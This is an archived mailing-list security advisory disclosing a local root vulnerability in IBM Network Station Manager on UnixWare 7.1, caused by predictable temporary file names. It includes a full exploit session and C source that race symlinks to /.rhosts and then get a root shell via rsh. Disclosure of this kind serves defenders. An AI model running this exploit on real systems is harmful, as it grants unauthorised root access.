Greetings, OVERVIEW A vulnerability in IBM's Network Station Manager will allow any local user to gain root privileges. BACKGROUND Though I only tested NetStation on UnixWare 7.1, I would imagine that this vulnerability is present on most NetStation implementations. This daemon is installed/running as root by default. DETAILS >From the help html: The IBM Network Station Manager is a browser-based tool for centrally administering IBM Network Stations and their users. Using the IBM Network Station Manager, the administrator can set IBM Network Station settings on a server wide basis or an individual user or workstation basis. Settings are specifications defining hardware (keyboards, mouse speeds and so on) and software as it applies to your session. More or less, it's an http gui for managing your desktop configuration. A vulnerability exists in the way NetStation creates temporary files. Instead of using the secure-ish mktemp, NetStation merely appends the current time in seconds to a known file name. Normally, tmp races aren't a big deal for http daemons since they run as nobody or similar, but NetStation must run as root to be able to open/modify files as a specific user. Thus, we can brute force a symlink from xnec.nsu.<time> to /.rhosts and gain root. EXPLOIT bash-2.02$ ls /usr/netstation/nsm/users/xnec UX:ls: ERROR: Cannot access /usr/netstation/nsm/users/xnec: No such file or directory <now we go to http://localhost:880, login and click on> <Hardware -> Workstation> bash-2.02$ ls /usr/netstation/nsm/users/xnec xnec.nsu xnec.usr bash-2.02$ cc -o nsmx nsmx.c bash-2.02$ ./nsmx <click on Workstation again> bash-2.02$ ls -la /.rhosts -rwx------ 1 xnec other 0 Dec 28 06:19 /.rhosts bash-2.02$ echo "+ +" > /.rhosts bash-2.02$ chown root /.rhosts bash-2.02$ rsh -l root localhost sh -i # id uid=0(root) gid=3(sys) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp) # /* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit * * Exploits a temporary file race condition in NetStation's HTTP interface * * To exploit: first, change the paths below to reflect your individual * settings/paths. Don't worry if <username>.nsu doesn't exist, NS will * create it for you. Next, point your browser at * http://localhost:880 and login as a normal user. Click on "Hardware" * Then "workstation". This will create <netstationdir>/users/xnec. * Next, compile and run this program. You only have thirty seconds from * the time you complete this step to then click on "Workstation". When * this is done, you should have an /.rhosts which you own. On some * UnixWare systems, you may need to chown root /.rhosts in order to do * rsh -l root localhost sh -i. * * Brock Tellier btellierat_private * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/time.h> void main() { /* Change these paths */ char dest[20] = "/.rhosts"; char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu"; char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu"; long sec; int i; sec = time(0); for (i = 0; i < 30; i++) { sprintf(sourcesym, "%s%d", source, (sec + i)); symlink(dest,sourcesym); } } Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellierat_private ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:23:51 PDT